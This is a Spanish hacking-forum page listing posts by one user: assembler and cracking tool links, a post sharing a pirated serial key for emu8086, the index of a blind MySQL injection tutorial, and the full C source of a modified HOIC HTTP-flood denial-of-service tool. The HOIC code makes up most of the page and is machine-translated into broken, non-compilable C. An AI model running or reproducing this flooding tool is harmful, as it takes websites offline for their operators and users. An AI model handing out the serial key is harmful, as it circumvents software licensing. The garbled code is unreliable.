Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Stuxnet

#121
Tener conocimiento en el lenguaje ASM (ensamblador)

Que es ASM

Se denomina lenguaje máquina a la serie de datos que la parte física de la computadora o hardware, es capaz de interpretar.

Una computadora digital o, mejor dicho, su parte física, sólo distingue  datos de tipo binario, es decir, constituidos por dos únicos valores a los que se denomina valor 0 y valor 1 y que, físicamente,  se materializan con tensiones comprendidas entre 0 y 4.0 voltios y entre 4 y 5 voltios, respectivamente. Para representar datos que contengan una información se utilizan una serie de unos y ceros cuyo conjunto indica dicha información.


Algunos ASM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Paquete para programar aplicaciones para Windows con MASM (Microsoft Macro Assembler).

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Ensamblador para DOS, Windows y Linux. Soporta tanto 16, 32 como 64 bits. Open Source.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Ensamblador alternativo pera orientado mas que nada a Linux. Soporta 16, 32 y 64 bits. Open Source.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Debugger's

Es un programa usado para probar y depurar (eliminar los errores) de otros programas (el programa "objetivo"). El código a ser examinado puede alternativamente estar corriendo en un simulador de conjunto de instrucciones (ISS), una técnica que permite gran potencia en su capacidad de detenerse cuando son encontradas condiciones específicas pero será típicamente algo más lento que ejecutando el código directamente en el apropiado (o el mismo) procesador. Algunas depuradores ofrecen dos modos de operación - la simulación parcial o completa, para limitar este impacto.

Entre los mas comunes tenemos

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Hex editor

Un editor hexadecimal (o editor de archivos binarios o editor de bytes ) es un tipo de programa de ordenador que permite al usuario manipular la fundamental binarios (0 / 1, cero / uno) datos que componen los archivos de computadora . Tenga en cuenta que los archivos de computadora puede ser muy pequeño (sólo un nombre, sin contenido) a muy grandes (de contenido que abarcan varios discos duros). Un archivo de computadora típica ocupa varias áreas en el plato (s) de una unidad de disco, cuyo contenido se juntan para formar el archivo. Editores hexadecimales que fueron diseñados para leer ("parse") y editar sector los datos de los segmentos físicos de disco o los discos duros a veces fueron llamados editores de sector o de los editores de disco .

Entre estos tenemos

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Tutoriales

Bien aqui les dejo la web de maestro del cracking Ricardo Narvaja No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Los tutoriales para OllyDbg No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

y algunos manuales de Programacion

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#122
ASM / Descargar emu8086
Noviembre 21, 2011, 09:57:20 PM

Micro Assembler IDE includes advanced source editor, 8086 assembler and IDE.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Serial

Código: php
User:ISHAAN,glaitm    Key:27R3VDEFYFX4N0VC3FRTQZX
User:ISHAAN,glaitm    Key:27R3VDEFYFX4N0VC3FRTQZX

#123
Cursos, manuales y libros / Blind MySQL Injection
Noviembre 19, 2011, 04:16:23 PM
Blind MySQL Injection
Técnicas de inyección a ciegas en MySQL
Autor: ka0x <ka0x01[at]gmail.com>
Colaboradores:
- Piker <piker0x90[at]gmail.com>
- NullWave07 <nullwave07[at]gmail.com>

Índice:
0x01: Introducción
0x02: Tabla de la DB y archivo vulnerable
0x03: Comprobando si el servidor es vulnerable
0x04: Sacando información
0x05: Sacando número de registros de la tabla "users"
0x06: Buscando los nombres de las columnas
0x07: Leyendo datos de la columna + p0c
0x08: load_file en inyección a ciegas
0x09: La función benchmark


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#124
Códigos Fuentes / [SC] HOIC modificado by CrashOverrider:
Noviembre 03, 2011, 12:44:29 PM
Código: c
/ * HOIC - cañón de iones de alta orbital

     . * Hoic archivos:
     * Líneas de ejemplo válido:
     * # (Comentarios)
     * URL: http://www.example.org:80/foo/bar
     * User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
     * Juego de caracteres: ISO-8859-1
     * Aceptar: text / html
     *
     * Se necesita al menos una de cada una de las líneas anteriores para que funcione.
     * URL siempre debe incluir "http://" y un puerto. No HTTPS, sin embargo, lo siento.
     *
     * Este código se libera en el dominio público.
     *
     * - Anónimo
     * /
     
    # Include
    # Include
    # Include <sys/types.h>
    # Include <sys/socket.h>
    # Include <netinet/in.h>
    # Include <netdb.h>
    # Include <stdarg.h>
    # Include <string.h>
     
    / * Si usted está escribiendo cargas personalizadas, que controlan lo que
       pasa a la conexión después de enviar su petición * /
    # Define CLOSENOW 0
    # Define leer 1
    # Define repetir 2
     
    # Define SOCKET_BUF_SIZE 2048
     
    typedef struct {list_t
            char * datos;
            struct list_t * siguiente;
    List_t};
     
    list_t urls *;
    int numUrls = 0;
    list_t * userAgents;
    int numUserAgents = 0;
    list_t * acceptTypes;
    int numAcceptTypes = 0;
    list_t charsets *;
    int numCharsets = 0;
     
    int socket_printf (int sockfd, const char * fmt, ...)
    {
            int retval = 0;
            va_list ap;
            char * cadena = malloc (SOCKET_BUF_SIZE);
           
            va_start (ap, fmt);
            retval = vsprintf (str, fmt, ap);
            va_end (ap);
     
       escribir (sockfd, str, strlen (str));
            libre (str);
            volver retval;
    }
     
    / * Crear un retraso aleatorio de milisegundos entre inferiores y superiores. * /
    randomDelay vacío (int límite inferior, límite superior int) {
            int r = límite inferior + (rand () / (float) RAND_MAX) * (límite superior - límite inferior);
            usleep (1000 * R);
    }
     
    AddURL vacío (char * data) {
            list_t * el = (list_t *) malloc (sizeof (list_t));
            list_t * cabeza urls =;
     
            numUrls + +;
     
            el-> data = strdup (datos);
            el-> siguiente = NULL;
     
            if (urls == NULL) {
                    urls = el;
                    return;
            }
     
            while (cabeza-> siguiente! = NULL) {
                    cabeza = cabeza-> siguiente;
            }
     
            cabeza-> siguiente = el;
    }
     
    addUserAgent vacío (char * data) {
            list_t * el = (list_t *) malloc (sizeof (list_t));
            list_t * cabeza = userAgents;
     
            el-> data = strdup (datos);
            el-> siguiente = NULL;
           
            numUserAgents + +;
     
            if (userAgents == NULL) {
                    userAgents = el;
                    return;
            }
     
            while (cabeza-> siguiente! = NULL) {
                    cabeza = cabeza-> siguiente;
            }
     
            cabeza-> siguiente = el;
    }
     
    addAcceptType vacío (char * data) {
            list_t * el = (list_t *) malloc (sizeof (list_t));
            list_t * cabeza = acceptTypes;
     
            el-> data = strdup (datos);
            el-> siguiente = NULL;
     
            numAcceptTypes + +;
     
            if (acceptTypes == NULL) {
                    acceptTypes = el;
                    return;
            }
     
            while (cabeza-> siguiente! = NULL) {
                    cabeza = cabeza-> siguiente;
            }
     
            cabeza-> siguiente = el;
    }
     
    AddCharset vacío (char * data) {
            list_t * el = (list_t *) malloc (sizeof (list_t));
            list_t * cabeza = juegos de caracteres;
     
            printf ("Juego de caracteres:% s \ n", datos);
     
            el-> data = strdup (datos);
            el-> siguiente = NULL;
     
            numCharsets + +;
     
            if (juegos de caracteres == NULL) {
                    charsets = el;
                    return;
            }
     
            while (cabeza-> siguiente! = NULL) {
                    cabeza = cabeza-> siguiente;
            }
     
            cabeza-> siguiente = el;
    }
     
    char * listGet (list_t * cabeza, int n) {
            if (cabeza == NULL) {
                    fprintf (stderr, "no listGet% (d) \ n", n);
                    exit (1);
            }
     
            if (n == 0) return cabeza-> data;
     
            volver listGet (cabeza-> siguiente, n-1);
    }
     
    char * randomUrl (void) {
            int sel = (rand () / (float) RAND_MAX) numUrls *;
            volver listGet (urls, sel);
    }
     
    randomUserAgent char * (void) {
            int sel = (rand () / (float) RAND_MAX) numUserAgents *;
            volver listGet (userAgents, sel);
    }
     
    char * randomAcceptString (void) {
            int sel = (rand () / (float) RAND_MAX) * numAcceptTypes;
            volver listGet (acceptTypes, sel);
    }
     
    char * randomCharset (void) {
            int sel = (rand () / (float) RAND_MAX) numCharsets *;
            volver listGet (juegos de caracteres, sel);
    }
     
    int randomKeepAlive (void) {
            devolución de 30 + (((rand () / (float) RAND_MAX) * 5) * 15);
    }
     
    / * Generar una solicitud plausible de aspecto HTTP.
     
            Esto va a generar todo lo que antes de la final \ r \ n,
            para permitir que la carga útil () para agregar encabezados.
     
            llamar finish_http_request () después de este
            para generar el resto.
    * /
    send_http_request vacío (int sockfd, char * host, char * uri) {
            socket_printf (sockfd, "GET /% s HTTP/1.1 \ r \ n", uri);
            socket_printf (sockfd, "Host:% s \ r \ n", host);
            socket_printf (sockfd, "User-Agent:% s \ r \ n", randomUserAgent ());
            socket_printf (sockfd, "Aceptar:% s,% s,% s, q = 0,9 ,*/*; q = 0,8 \ r \ n",
                                                    randomAcceptString (),
                                                    randomAcceptString (),
                                                    randomAcceptString ());
            socket_printf (sockfd, "Keep-Alive:% d \ r \ n", randomKeepAlive ());
            socket_printf (sockfd, "Cache-Control: no-cache \ r \ n");
            socket_printf (sockfd, "Accept-Charset:% s,% s,, q = 0,7, *, q = 0,7 \ r \ n",
                                                    randomCharset (), randomCharset ());
    }
     
    finish_http_request vacío (int sockfd) {
            socket_printf (sockfd, "\ r \ n");
    }
     
    / *
            / / CLOSENOW si el socket debe ser cerrado inmediatamente.
            / / Leer leer de nuevo los datos de toma y cierre.
            / / Repetir si debemos mantener la cabeza abierta y hacer otra petición.
    * /
    int carga (int sockfd, anfitrión char *, char * uri) {
            send_http_request (sockfd, host, uri);
            finish_http_request (sockfd);
     
            libre (host);
            libre (URI);
     
            volver CLOSENOW;
    }
     
    int main (int argc, char * argv []) {
            peticiones unsigned int, cargas;
            int sockfd, portno, n, resolver, vuelva a conectar;
            struct sockaddr_in serv_addr;
            struct hostent * servidor;
            carbón buffer [1024];
     
            printf ("GEOSYNCRONOUS ORBITAL cañón de iones (GOIC) \ n".)
     
            if (argc <2) {
                    fprintf (stderr,
                                      "Uso:% s <file.goic> \ n",
                                      argv [0]);
                    exit (1);
            }
     
            FILE * fp = fopen (argv [1], "r");
            caracteres de línea [1024];
     
            if (fp == NULL) {
                    fprintf (stderr, "Error al abrir el archivo '% s' \ n", argv [1]);
                    exit (1);
            }
     
            while (fgets (linea, 1024, fp)! = NULL) {
                    if (linea [0] == '#') siguen;
     
                    línea [strlen (línea) -1] = '\ 0';
     
                    if (0 == strncmp (línea, "URL", 5))
                            AddURL (strdup (línea 5));
     
                    else if (0 == strncmp (línea, "user-agent", 11))
                            addUserAgent (strdup (línea 11));
     
                    else if (0 == strncmp (línea, "Aceptar", 8))
                            addAcceptType (strdup (línea 8));
     
                    else if (0 == strncmp (línea, "Juego de caracteres:", 9))
                            AddCharset (strdup (línea 9));
     
                    else if (linea [0] == '\ r' | | line [0] == '\ n') siguen;
            }
     
            / * La semilla del generador de números aleatorios * /
            srand (time (0));
     
            resolver = 1;
            reconectar = 1;
            peticiones = 0;
            cargas = 0;
     
            while (1) {
                    char * url = randomUrl ();
     
                    anfitrión char [255];
                    caracteres uri [255];
     
                    sscanf (url, "254% http:// [^:]:% 99d /% 254 [^ \ n]", de acogida, y portno, uri);
     
                    if ((% carga útil 100) == 0) {
                            printf ("* Informe sobre la marcha:");
                            printf ("% los intentos de conexión u /% u cargas entregadas. \ n",
                                                    peticiones,
                                                    cargas);
                    }
     
                    if (conectar) {
                            sockfd = socket (AF_INET, SOCK_STREAM, 0);
                            peticiones + +;
                    }
     
                    if (sockfd <0) {
                            fprintf (stderr, ". Error al crear el socket Vamos a esperar e intentarlo de nuevo \ n".)
                            randomDelay (5000,20000);
                            reconectar = 1;
                            continuar;
                    }
     
                    if (resolver) {
                            printf ("host Resolución:% s \ n", host);
     
                            servidor = gethostbyname (host);
     
                            if (servidor == NULL) {
                                    fprintf (stderr, "Error: No se ha podido resolver el host:% s \ n", host);
                                    randomDelay (500,5000);
                                    continuar;
                            }
                   
                            bzero ((char *) & serv_addr, sizeof (serv_addr));
                            serv_addr.sin_family = AF_INET;
                            bcopy ((char *) en el servidor> h_addr,
                                            (Char *) y serv_addr.sin_addr.s_addr,
                                            servidor> h_length);
                   
                            serv_addr.sin_port = htons (portno);
     
                            resolver = 0;
                    }
     
                    if (y volver a conectar y conectar (sockfd, y serv_addr, sizeof (serv_addr)) <0) {
                            resolver = 1;
                            reconectar = 1;
                            fprintf (stderr,
                            "Host parece estar rechazando las conexiones victoria está a la mano 1111one \ n!");
                            randomDelay (50,1000);
                            continuar;
                    }
     
                    n = carga útil (sockfd, strdup (host), strdup (URI));
                    cargas + +;
                   
                    if (n == CLOSENOW) {
                            cierre (sockfd);
                            reconectar = 1;
                    } Else if (n == LEER) {
                            leer (sockfd, buffer, 1024);
                            randomDelay (50,1000);
                            cierre (sockfd);
                            reconectar = 1;
                    Else {}
                            if (leer (sockfd, buffer, 1024)) {
                                    reconectar = 0;
                                    resolver = 0;
                            Else {}
                                    reconectar = 1;
                                    resolver = 1;
                            }
                    }
            }
     
            return 0;
    }